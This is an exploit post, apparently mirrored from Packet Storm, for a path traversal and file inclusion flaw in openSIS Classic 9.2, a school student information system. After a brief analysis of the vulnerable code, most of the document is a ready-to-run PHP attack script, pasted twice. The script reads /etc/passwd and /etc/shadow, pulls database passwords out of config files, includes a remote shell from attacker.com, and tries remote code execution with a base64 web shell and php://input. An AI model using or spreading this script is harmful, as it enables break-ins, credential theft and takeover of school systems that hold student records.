Share
## https://sploitus.com/exploit?id=PACKETSTORM:215238
=============================================================================================================================================
    | # Title     : openSIS Classic vโ€ฏ9.2 Path Traversal Exploit                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.opensis.com                                                                                                     |
    =============================================================================================================================================
    
    [+] References : 
    
    [+] Summary : Critical Path Traversal / Local File Inclusion (LFI) vulnerability in openSIS Student Information System.
    
    [+] Vulnerable Code Analysis :
    
    [+] Location: Modules.php
    
    
    // Vulnerable line 39-47
    if ( substr( $modname, -4, 4 ) !== '.php'
        || strpos( $modname, '..' ) !== false
        /*|| ! is_file( 'modules/' . $modname )*/ )
    {
        // Log hacking attempt
    }
    else
    {
        require_once 'modules/' . $modname;  // DIRECT FILE INCLUSION
    }
    
    [+] Root Causes:
    
        No Input Sanitization: $modname = $_REQUEST['modname']; (direct assignment)
    
        Weak Validation: Only checks for .php extension and ..
    
        Comment-Out Critical Check: ! is_file( 'modules/' . $modname ) commented out
    
        No Whitelist/Blacklist: No validation of allowed modules
    			 
    			  
    [+]  POC : php poc.php
    
    <?php
    // exploit_openSIS.php
    
    class openSISExploit {
        private $target_url;
        private $session_cookie;
        
        public function __construct($target_url, $session_cookie = null) {
            $this->target_url = rtrim($target_url, '/');
            $this->session_cookie = $session_cookie;
        }
        
        public function test_directory_traversal() {
            echo "[*] Testing Directory Traversal in openSIS\n";
            
            $payloads = [
                // Basic directory traversal
                '../../../etc/passwd',
                '../../../../etc/passwd',
                '..\\..\\..\\etc\\passwd', // Windows
                // Null byte injection
                '../../../etc/passwd%00.php',
                // Encoded payloads
                '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',
                // Double encoding
                '..%252f..%252f..%252fetc%252fpasswd',
                // UTF-8 bypass
                '..%c0%af..%c0%af..%c0%afetc%c0%afpasswd',
                // File inclusion without .php
                '../../../etc/passwd.php',
            ];
            
            foreach ($payloads as $payload) {
                $url = $this->target_url . "/Modules.php?modname=" . $payload;
                echo "\n[*] Testing: " . $payload;
                
                $response = $this->make_request($url);
                
                if (strpos($response, 'root:') !== false || 
                    strpos($response, 'daemon:') !== false) {
                    echo " โœ… SUCCESS - File read!\n";
                    return $payload;
                } elseif (strpos($response, 'Warning') !== false ||
                          strpos($response, 'Fatal error') !== false) {
                    echo " โš ๏ธ  ERROR - But vulnerable\n";
                } else {
                    echo " โŒ Failed\n";
                }
            }
            
            return false;
        }
        
        public function test_local_file_inclusion() {
            echo "\n[*] Testing Local File Inclusion (LFI)\n";
            
            $files = [
                // System files
                '/etc/passwd',
                '/etc/shadow',
                '/etc/hosts',
                '/etc/issue',
                '/proc/self/environ',
                '/proc/version',
                // openSIS config files
                '../../config.inc.php',
                '../config.inc.php',
                'config.inc.php',
                // PHP files
                'index.php',
                'Warehouse.php',
                // Log files
                '../../logs/error.log',
                // Session files
                '/tmp/sess_' . session_id(),
            ];
            
            foreach ($files as $file) {
                $url = $this->target_url . "/Modules.php?modname=" . $file . ".php";
                echo "\n[*] Trying: " . $file;
                
                $response = $this->make_request($url);
                
                if (strlen($response) > 100 && 
                    !strpos($response, '<html') && 
                    !strpos($response, '404')) {
                    echo " โœ… Found\n";
                    // Show first 500 chars
                    echo substr($response, 0, 500) . "...\n";
                }
            }
        }
        
        public function test_remote_file_inclusion() {
            echo "\n[*] Testing Remote File Inclusion (RFI)\n";
            
            // Try to include remote PHP file
            $remote_files = [
                'http://attacker.com/shell.txt',
                'http://attacker.com/shell.php',
                '\\\\attacker.com\\share\\shell.php', // Windows UNC
                'php://filter/convert.base64-encode/resource=index.php',
                'data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=', // PHP shell
            ];
            
            foreach ($remote_files as $remote_file) { // ุชู… ุงู„ุชุตุญูŠุญ ู‡ู†ุง - ูƒุงู† "in" ุจุฏู„ุงู‹ ู…ู† "as"
                $url = $this->target_url . "/Modules.php?modname=" . urlencode($remote_file);
                echo "\n[*] Testing RFI: " . $remote_file;
                
                $response = $this->make_request($url);
                
                if (strpos($response, 'PHP') !== false ||
                    strpos($response, 'system') !== false) {
                    echo " โš ๏ธ  Possible RFI\n";
                }
            }
        }
        
        public function exploit_to_rce() {
            echo "\n[*] Attempting to gain Remote Code Execution\n";
            
            // Method 1: PHP filter chain
            $payload = 'php://filter/convert.base64-encode/resource=modules/../../index.php';
            $url = $this->target_url . "/Modules.php?modname=" . $payload;
            
            $response = $this->make_request($url);
            
            if (strpos($response, 'PD9waHA') !== false) {
                echo "[+] Found base64 encoded file\n";
                // Decode and look for credentials
                $base64 = substr($response, strpos($response, 'PD9waHA'));
                $decoded = base64_decode($base64);
                
                // Look for database credentials
                if (preg_match('/\$DatabaseServer\s*=\s*[\'"](.*?)[\'"]/', $decoded, $matches)) {
                    echo "[+] Database Server: " . $matches[1] . "\n";
                }
                if (preg_match('/\$DatabaseUsername\s*=\s*[\'"](.*?)[\'"]/', $decoded, $matches)) {
                    echo "[+] Database Username: " . $matches[1] . "\n";
                }
                if (preg_match('/\$DatabasePassword\s*=\s*[\'"](.*?)[\'"]/', $decoded, $matches)) {
                    echo "[+] Database Password: " . $matches[1] . "\n";
                }
            }
            
            // Method 2: Try to access PHP wrapper
            echo "\n[*] Testing PHP wrappers\n";
            $wrappers = [
                'php://input',
                'data://text/plain,<?php system("id"); ?>',
                'expect://ls',
            ];
            
            foreach ($wrappers as $wrapper) { // ุชู… ุงู„ุชุตุญูŠุญ ู‡ู†ุง ุฃูŠุถุงู‹
                $url = $this->target_url . "/Modules.php?modname=" . urlencode($wrapper);
                
                // For php://input, need POST data
                $post_data = ($wrapper === 'php://input') ? '<?php system("id"); ?>' : null;
                
                $response = $this->make_request($url, $post_data);
                
                if (strpos($response, 'uid=') !== false) {
                    echo "[+] RCE Achieved via " . $wrapper . "\n";
                    return true;
                }
            }
            
            return false;
        }
        
        public function scan_for_modules() {
            echo "\n[*] Scanning for accessible modules\n";
            
            // Common openSIS modules
            $modules = [
                'Students/Student.php',
                'Users/User.php',
                'Grades/Grades.php',
                'Attendance/Attendance.php',
                'Scheduling/Schedule.php',
                'Food_Service/Menus.php',
                'Accounting/Accounts.php',
            ];
            
            foreach ($modules as $module) { // ุชู… ุงู„ุชุตุญูŠุญ ู‡ู†ุง
                $url = $this->target_url . "/Modules.php?modname=" . $module;
                $response = $this->make_request($url);
                
                if (strpos($response, 'HackingLog') === false && 
                    !strpos($response, '404') &&
                    strlen($response) > 100) {
                    echo "[+] Found: " . $module . "\n";
                }
            }
        }
        
        private function make_request($url, $post_data = null) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            
            if ($this->session_cookie) {
                curl_setopt($ch, CURLOPT_COOKIE, $this->session_cookie);
            }
            
            if ($post_data) {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
            }
            
            $response = curl_exec($ch);
            curl_close($ch);
            
            return $response;
        }
        
        public function run_full_test() {
            echo "==================================\n";
            echo " openSIS Path Traversal Exploit\n";
            echo "==================================\n";
            
            $this->test_directory_traversal();
            $this->test_local_file_inclusion();
            $this->scan_for_modules();
            $this->exploit_to_rce();
            
            echo "\n[*] Exploitation completed\n";
        }
    }
    
    // Usage
    if (isset($argv) && $argc > 1) {
        $target = $argv[1];
        $cookie = ($argc > 2) ? $argv[2] : null;
        
        $exploit = new openSISExploit($target, $cookie);
        $exploit->run_full_test();
    } else {
        echo "Usage: php " . basename(__FILE__) . " http://target.com [session_cookie]\n";
        echo "Example: php " . basename(__FILE__) . " http://school.edu/openSIS \"PHPSESSID=abc123\"\n";
    }<?php
    // exploit_openSIS.php
    
    class openSISExploit {
        private $target_url;
        private $session_cookie;
        
        public function __construct($target_url, $session_cookie = null) {
            $this->target_url = rtrim($target_url, '/');
            $this->session_cookie = $session_cookie;
        }
        
        public function test_directory_traversal() {
            echo "[*] Testing Directory Traversal in openSIS\n";
            
            $payloads = [
                // Basic directory traversal
                '../../../etc/passwd',
                '../../../../etc/passwd',
                '..\\..\\..\\etc\\passwd', // Windows
                // Null byte injection
                '../../../etc/passwd%00.php',
                // Encoded payloads
                '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',
                // Double encoding
                '..%252f..%252f..%252fetc%252fpasswd',
                // UTF-8 bypass
                '..%c0%af..%c0%af..%c0%afetc%c0%afpasswd',
                // File inclusion without .php
                '../../../etc/passwd.php',
            ];
            
            foreach ($payloads as $payload) {
                $url = $this->target_url . "/Modules.php?modname=" . $payload;
                echo "\n[*] Testing: " . $payload;
                
                $response = $this->make_request($url);
                
                if (strpos($response, 'root:') !== false || 
                    strpos($response, 'daemon:') !== false) {
                    echo " โœ… SUCCESS - File read!\n";
                    return $payload;
                } elseif (strpos($response, 'Warning') !== false ||
                          strpos($response, 'Fatal error') !== false) {
                    echo " โš ๏ธ  ERROR - But vulnerable\n";
                } else {
                    echo " โŒ Failed\n";
                }
            }
            
            return false;
        }
        
        public function test_local_file_inclusion() {
            echo "\n[*] Testing Local File Inclusion (LFI)\n";
            
            $files = [
                // System files
                '/etc/passwd',
                '/etc/shadow',
                '/etc/hosts',
                '/etc/issue',
                '/proc/self/environ',
                '/proc/version',
                // openSIS config files
                '../../config.inc.php',
                '../config.inc.php',
                'config.inc.php',
                // PHP files
                'index.php',
                'Warehouse.php',
                // Log files
                '../../logs/error.log',
                // Session files
                '/tmp/sess_' . session_id(),
            ];
            
            foreach ($files as $file) {
                $url = $this->target_url . "/Modules.php?modname=" . $file . ".php";
                echo "\n[*] Trying: " . $file;
                
                $response = $this->make_request($url);
                
                if (strlen($response) > 100 && 
                    !strpos($response, '<html') && 
                    !strpos($response, '404')) {
                    echo " โœ… Found\n";
                    // Show first 500 chars
                    echo substr($response, 0, 500) . "...\n";
                }
            }
        }
        
        public function test_remote_file_inclusion() {
            echo "\n[*] Testing Remote File Inclusion (RFI)\n";
            
            // Try to include remote PHP file
            $remote_files = [
                'http://attacker.com/shell.txt',
                'http://attacker.com/shell.php',
                '\\\\attacker.com\\share\\shell.php', // Windows UNC
                'php://filter/convert.base64-encode/resource=index.php',
                'data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=', // PHP shell
            ];
            
            foreach ($remote_files as $remote_file) { // ุชู… ุงู„ุชุตุญูŠุญ ู‡ู†ุง - ูƒุงู† "in" ุจุฏู„ุงู‹ ู…ู† "as"
                $url = $this->target_url . "/Modules.php?modname=" . urlencode($remote_file);
                echo "\n[*] Testing RFI: " . $remote_file;
                
                $response = $this->make_request($url);
                
                if (strpos($response, 'PHP') !== false ||
                    strpos($response, 'system') !== false) {
                    echo " โš ๏ธ  Possible RFI\n";
                }
            }
        }
        
        public function exploit_to_rce() {
            echo "\n[*] Attempting to gain Remote Code Execution\n";
            
            // Method 1: PHP filter chain
            $payload = 'php://filter/convert.base64-encode/resource=modules/../../index.php';
            $url = $this->target_url . "/Modules.php?modname=" . $payload;
            
            $response = $this->make_request($url);
            
            if (strpos($response, 'PD9waHA') !== false) {
                echo "[+] Found base64 encoded file\n";
                // Decode and look for credentials
                $base64 = substr($response, strpos($response, 'PD9waHA'));
                $decoded = base64_decode($base64);
                
                // Look for database credentials
                if (preg_match('/\$DatabaseServer\s*=\s*[\'"](.*?)[\'"]/', $decoded, $matches)) {
                    echo "[+] Database Server: " . $matches[1] . "\n";
                }
                if (preg_match('/\$DatabaseUsername\s*=\s*[\'"](.*?)[\'"]/', $decoded, $matches)) {
                    echo "[+] Database Username: " . $matches[1] . "\n";
                }
                if (preg_match('/\$DatabasePassword\s*=\s*[\'"](.*?)[\'"]/', $decoded, $matches)) {
                    echo "[+] Database Password: " . $matches[1] . "\n";
                }
            }
            
            // Method 2: Try to access PHP wrapper
            echo "\n[*] Testing PHP wrappers\n";
            $wrappers = [
                'php://input',
                'data://text/plain,<?php system("id"); ?>',
                'expect://ls',
            ];
            
            foreach ($wrappers as $wrapper) { // ุชู… ุงู„ุชุตุญูŠุญ ู‡ู†ุง ุฃูŠุถุงู‹
                $url = $this->target_url . "/Modules.php?modname=" . urlencode($wrapper);
                
                // For php://input, need POST data
                $post_data = ($wrapper === 'php://input') ? '<?php system("id"); ?>' : null;
                
                $response = $this->make_request($url, $post_data);
                
                if (strpos($response, 'uid=') !== false) {
                    echo "[+] RCE Achieved via " . $wrapper . "\n";
                    return true;
                }
            }
            
            return false;
        }
        
        public function scan_for_modules() {
            echo "\n[*] Scanning for accessible modules\n";
            
            // Common openSIS modules
            $modules = [
                'Students/Student.php',
                'Users/User.php',
                'Grades/Grades.php',
                'Attendance/Attendance.php',
                'Scheduling/Schedule.php',
                'Food_Service/Menus.php',
                'Accounting/Accounts.php',
            ];
            
            foreach ($modules as $module) { // ุชู… ุงู„ุชุตุญูŠุญ ู‡ู†ุง
                $url = $this->target_url . "/Modules.php?modname=" . $module;
                $response = $this->make_request($url);
                
                if (strpos($response, 'HackingLog') === false && 
                    !strpos($response, '404') &&
                    strlen($response) > 100) {
                    echo "[+] Found: " . $module . "\n";
                }
            }
        }
        
        private function make_request($url, $post_data = null) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_TIMEOUT, 10);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            
            if ($this->session_cookie) {
                curl_setopt($ch, CURLOPT_COOKIE, $this->session_cookie);
            }
            
            if ($post_data) {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
            }
            
            $response = curl_exec($ch);
            curl_close($ch);
            
            return $response;
        }
        
        public function run_full_test() {
            echo "==================================\n";
            echo " openSIS Path Traversal Exploit\n";
            echo "==================================\n";
            
            $this->test_directory_traversal();
            $this->test_local_file_inclusion();
            $this->scan_for_modules();
            $this->exploit_to_rce();
            
            echo "\n[*] Exploitation completed\n";
        }
    }
    
    // Usage
    if (isset($argv) && $argc > 1) {
        $target = $argv[1];
        $cookie = ($argc > 2) ? $argv[2] : null;
        
        $exploit = new openSISExploit($target, $cookie);
        $exploit->run_full_test();
    } else {
        echo "Usage: php " . basename(__FILE__) . " http://target.com [session_cookie]\n";
        echo "Example: php " . basename(__FILE__) . " http://school.edu/openSIS \"PHPSESSID=abc123\"\n";
    }
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================